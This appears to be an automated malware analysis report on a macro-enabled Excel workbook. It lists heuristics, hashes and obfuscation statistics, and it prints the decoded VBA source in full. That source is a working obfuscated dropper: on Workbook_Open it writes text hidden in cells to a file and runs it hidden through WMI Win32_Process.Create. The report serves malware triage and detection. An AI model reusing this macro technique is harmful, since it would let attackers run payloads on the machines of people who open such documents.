Malware Insights
The sample is an Office document containing VBA macros, indicated by the OOXML_VBA and OLE_VBA_WBOPEN heuristics. The Workbook_Open macro is present and uses GetObject, suggesting an attempt to execute code. The obfuscated VBA script likely aims to download and execute a second-stage payload, as suggested by the presence of 'wmic' and 'winmgmts' commands within the document body, which could be used for process execution or information gathering. The VBA code itself is heavily obfuscated, making a precise determination of its actions difficult, but the overall pattern points to a macro-based downloader.
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set NVWNO_yHmgV_pzpAjrdH = GetObject(FpjJLsQxf_dLILsYhexySzHU.smvaPo_LuHKu).SpawnInstance_ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8528 bytes |
SHA-256: e870803c423b1dc52bedb7606d493995be398f2d2dca52c4777f9bf4e395670b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
124 of 235 identifiers look randomly generated (e.g. 'mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
DJKIsfM = IsEmpty("pnUrq5V_FnLN3")
IsError (IsObject(sXjVpSv6qX7wX))
lMkHXSTQnOiCg = IsNumeric("DvQ1GTU")
eljv_dniL_UQC.CVaBrkzWTGgYKziQdmUOi
IsNumeric ("NEFxij_KMkINX")
IsMissing (IsObject(MfkqalCIspE))
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG"
Function oGaIrqcmOGNffeylHHAnjz()
HdvnXO = IsDate(IsArray(SDXM4HM))
DAmkNFPZL5B6 = IsArray(IsObject("xhpjXMMLa66"))
IsObject (IsDate(TwCUAI3ZINml))
oGaIrqcmOGNffeylHHAnjz = Range("GQ85")
IsDate ("b0DhM1")
IsEmpty (IsArray(L6qJNn))
DWU4zAWKTvG = IsError("n6OPz1_xbfNWm")
End Function
Function WRAdwjBDRtstP_NI()
IsError (xZTTMtV_TXkFrt)
WRAdwjBDRtstP_NI = Range("FO77")
LcBx46x = IsEmpty(D8PXYnD)
IsArray (IsNumeric(f8AP7ls08p8D))
End Function
Function qTmsJrjdhKOHCkGzt()
IsError (IsArray("DFhQr09_tHkRU"))
qTmsJrjdhKOHCkGzt = Range("EL255")
PROqcbF = IsMissing(IsNumeric(Us6zbft_CWkibO))
IsDate ("lwQnIp4E5Mh")
End Function
Attribute VB_Name = "FpjJLsQxf_dLILsYhexySzHU"
Function QZdKuofowyE_FuKFt()
IsNumeric (jcxU8L)
IsMissing ("DP0t14")
IsEmpty (IsObject(L2txbqeTh6EI))
IsNull (IsArray(FxxcNY0cbrotd))
IsObject ("U7y8rqL")
IsDate (IsEmpty(ALgW76r_4XRXCr))
Slaxri = IsObject(NH7P9Xh)
YQbQCEB_d_wSD = mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG.oGaIrqcmOGNffeylHHAnjz
IsMissing (IsError(Xend7HMhrasSa))
Sly7Dg = IsDate(IsNumeric(Vx0Syvf))
rT0uqa6KTZEp = IsDate(nC4FvW_W42s4e)
IsError (kmWu9hC)
C0UONe0z02mw = IsMissing(IsObject("kXvNNX1heJS"))
IsArray ("H0qXKl")
QZdKuofowyE_FuKFt = YQbQCEB_d_wSD
GEcTXj1NqK6z = IsError(IsDate(EIzIqky))
IsNull (IsError("RYEQ019"))
IsNull (IsError(J1DXJIHDlglL))
End Function
Function smvaPo_LuHKu()
IsDate ("CITFVW_q8dB81")
IsEmpty (IsObject("SzKLN9y_KY0XO"))
tepEYGZposcdkPmNbGI_g = mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG.WRAdwjBDRtstP_NI
RUAUJuYnORRoLoCxYnILFGhiyKVKrJk = Range("GV180")
IsNumeric (IsNumeric("A0I3A0"))
IsNull (IsArray(MWVyaHW))
SWyxWOb = IsEmpty("IOqDTd_oJysDg")
IsEmpty (IsMissing(jX3t3Oz4wjy8))
IsMissing (IsNumeric("LQLJUS"))
FDrAHaBVgaDP = IsDate(IsDate(oy9gO7))
IsNull (IsDate("Ns2kR3_25vU90"))
IsError (IsNumeric(RGT37xK))
AHPs_MdBJewdz = NS_hiFrTA_qC.NGsSLbhckovf
smvaPo_LuHKu = RUAUJuYnORRoLoCxYnILFGhiyKVKrJk + AHPs_MdBJewdz + tepEYGZposcdkPmNbGI_g
IsDate (IsNumeric("cU1sVP_EvA0xF"))
TVL3BDy9j2J3 = IsError(UlEOZXXEjHH)
JzOmRIj = IsArray(lLNFUkvmHz8a)
End Function
Function wiBBvpqRh__zSVzPCvaMOL_euRwlS()
ei5AhlU = IsNumeric(N9oJdP_1FeN0t)
EAtnWDm = IsEmpty(ZWyD3N38KGjH0)
WwpdzarMW = ChrW(CLng((122 Xor (-5.59610705596107E-02 * (-1126 + 715#))))) _
XcQIyperjgHnYUkLwUrIQB_omKLGX = ChrW(99)
IsNumeric (IsError("ijD17qi"))
pfesCV_ALepDbpRabividywT = Chr(109) _
NfDoMCxkrMCUZuNQe_j_nFG_o = Chr(CLng((991 + (7.34645669291339 * -127))))
HOVpVKcU = ChrW(CLng((-187 + (2.91489361702128 * xlDialogUnhide))))
pQoeZlBGfQihYYjv_PGvLhBb_gDDAr = Chr(58)
LBKBBsPyeo_l_RA = ChrW(114)
IsNumeric ("ADEl1Z_auODz")
UivZG_gJBEGJHdYwaOGgrLIgyIX = Chr(105)
hrwSpbWjfYpdejHJWF = Replace("md>96md>96md>96n32_Procemd>96md>96", "md>96", "")
pyDMzuU = Chr(CLng((-579 + ((611 + 146#) - 59#))))
YStLWm_pwNQCIcJkIa = Chr(CLng((Not (-451 + 400#))))
IsError ("B4rpwdX_HWZRQ")
qprMnOaImaaASKco_psyyh_DCZAdxW = Chr(115) _
Xc_rxFjUfFKzQVSutZpRDegQ = Chr(CLng(((-610 - -422#) - -304)))
lzeAZmrnqijre = ChrW(105)
wiBBvpqRh__zSVzPCvaMOL_euRwlS = Join(Array(pyDMzuU & Chr(CLng(((-457 + 467#) Xor xlConeColClustered))) & Chr(CLng(((-224 + 299#) Xor xlRangeAutoFormatTable6))) _
& WwpdzarMW & Chr(CLng((xlHundredMillions + xlDialogDeleteFormat))) & pfesCV_ALepDbpRabividywT & Xc_rxFjUfFKzQVSutZpRDegQ & qprMnOaImaaASKco_psyyh_DCZAdxW & pQoeZlBGfQihYYjv_PGvLhBb_gDDAr & LBKBBsPyeo_l_RA & Chr(111) & ChrW(111) & ChrW(116) & Chr(92) & XcQIyperjgHnYUkLwUrIQB_omKLGX & lzeAZmrnqijre & Chr(109) & Chr(CLng((Not ((-1422 - -405#) + 898#)))) & YStLWm_pwNQCIcJkIa & NfDoMCxkrMCUZuNQe_j_nFG_o & HOVpVKcU & UivZG_gJBEGJHdYwaOGgrLIgyIX & hrwSpbWjfYpdejHJWF & NS_hiFrTA_qC.ucismXXbDEF))
ES9Jxw5 = IsArray("g2x9nPhSDALfu")
IsArray ("xDDaJhJ")
IsDate (AJkGC0uPuo53)
End Function
Function AAZJ_ixgCMsuxTjNw()
ImpFeh = IsObject("R497DO")
J1sk75plhteHI = IsArray(IsError("IXC6EBC0hN4p"))
IsObject ("PhAKdp")
kYByyrE = IsError(IsArray(WL6Lac))
r8oqpu = IsEmpty(RQ8Pjk)
biKccNhwalnlGxfNM = Range("HJ88")
B7eBCvh = IsNull(LhwBMhV_OrvZ2)
IsObject (IsEmpty(P7G4k0aCAeoV))
IsArray (IsNull(JKHgsau_G8TcN))
iYkw7w_sJEieg = IsError(IsEmpty("Lia4J6"))
StbN_CUMr_hw_GeA = Range("HZ247")
IsDate (IsDate("JcadeOl"))
AAZJ_ixgCMsuxTjNw = Join(Array(biKccNhwalnlGxfNM & StbN_CUMr_hw_GeA & mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG.qTmsJrjdhKOHCkGzt))
ZkAzC8a = IsArray(IsDate("ZM2NTH_BQyLOt"))
IsNumeric (IsDate(rNK4jhHkh5gtA))
gEfYJ9_6lL00 = IsNumeric(DpwsBGj_wODKg6)
End Function
Attribute VB_Name = "NS_hiFrTA_qC"
Attribute VB_Base = "0{AFF362B7-94F2-42CF-B067-534207BF8B96}{96D0F2CA-F860-4DEC-9DE8-BECD63BA89ED}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function NGsSLbhckovf()
IsDate ("F6pYby")
AnaOUw = IsDate("ajxl5gP")
IsArray (IsError("DDkXCRk"))
NGsSLbhckovf = Range("HL219")
IsObject ("ZWGC9GHh4uh")
IsMissing ("TgRh3c_P0HKI")
ukoKZL = IsNull("FlYibQ_XBoPV")
End Function
Function ucismXXbDEF()
IsEmpty (qfja4Qv)
ucismXXbDEF = Range("BK254")
NNSnK1 = IsNumeric(IsNumeric(iJfHnl))
U2BwNYTi9rjw = IsDate("CGMKpr")
End Function
Attribute VB_Name = "OhfmSJOBIU"
Function NVWNO_yHmgV_pzpAjrdH()
IsNumeric (IsNumeric(cdlovf))
IsNull (IsObject(uLwY8Y2))
IsEmpty (eeHuJ0FjGtwG)
Set NVWNO_yHmgV_pzpAjrdH = GetObject(FpjJLsQxf_dLILsYhexySzHU.smvaPo_LuHKu).SpawnInstance_
cYCcBtHuMMa3 = IsEmpty(IsDate("X1SNoOvu44ph"))
IsError (IsDate(ZPfhvq_XuKzFD))
IsObject (IsDate("ORPNAD_f6hXF"))
With NVWNO_yHmgV_pzpAjrdH
.ShowWindow = CLng((xlLeftBrace Or xlEPS))
End With
IsMissing (IsDate("GFeKMJ5"))
IsObject (IsEmpty("Mon3UcjmJ4R"))
Zkk2xJM8PhQ = IsNumeric(IsDate(Rk3VtoQ))
End Function
Attribute VB_Name = "eljv_dniL_UQC"
Function CVaBrkzWTGgYKziQdmUOi()
Dim C_elQEaM_fzlxQyq_OhFNIZo As String
WSKr6F = IsDate("YhIt08")
HNB4JHf = IsDate(IsArray(vF6O4Iu6sUb0u))
C_elQEaM_fzlxQyq_OhFNIZo = Replace(NS_hiFrTA_qC.sUff_NcuIfSGEerZBNFusVgwD.Text, "!s=/Cw^MNCNT", "")
IsArray (IsNumeric("SlO4ppVVpwXq"))
IsArray (IsDate("CkVJYze8wtdl6"))
KmTP5p_g1UknM = IsDate(IsDate("AIxKq9"))
Open Application.ActiveWorkbook.Path & FpjJLsQxf_dLILsYhexySzHU.QZdKuofowyE_FuKFt For Binary As #CLng((xlSortNormal Xor xlMicrosoftWord))
IsObject ("Zb7lMQK_p9Kul")
IsArray (Z0jRdK8_AK7KK)
Put #CLng((xlParamTypeChar And xlSourceSheet)), , C_elQEaM_fzlxQyq_OhFNIZo
WhN2o5395gTkz = IsArray(IsNumeric(HqmA5Z2pcyHz))
IsDate (CCLt9ujszujl)
Close #CLng((xlStandardSummary Or xlOLELink))
UwZeKb = IsDate(xQSNBhf_x4SgWt)
IsError ("XJdDIl3xanLoD")
hKRA_ZIYZJqlouGJs_zkg_SnH
K0XroISYwM0 = IsDate(IsObject(VEdA3NuczVd))
CWTLADq = IsArray(IsEmpty(Qb1PWJ))
End Function
Function hKRA_ZIYZJqlouGJs_zkg_SnH()
IsArray (Xjk7mWMeGLMp)
IH0bFN1 = IsArray("pfSZrz")
IsArray ("rFlYacu")
With GetObject(FpjJLsQxf_dLILsYhexySzHU.wiBBvpqRh__zSVzPCvaMOL_euRwlS)
.Create FpjJLsQxf_dLILsYhexySzHU.AAZJ_ixgCMsuxTjNw & Chr(34) & Application.ActiveWorkbook.Path & FpjJLsQxf_dLILsYhexySzHU.QZdKuofowyE_FuKFt & Chr(34), Null, OhfmSJOBIU.NVWNO_yHmgV_pzpAjrdH
End With
IsDate (IsError(NvDXHX_TgpXLG))
IsEmpty (IsDate(QgXXZXK))
PyMe5pq = IsArray(jmfQKpW)
NpFfX58_DjN57s = IsDate(IsDate(S3HIfQR))
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 58368 bytes |
SHA-256: 268a89195c6bb9b45a88d4d673b514818686431e21d91e0e57b2ad65e482e1a3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
742 of 1102 identifiers look randomly generated (e.g. 'mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.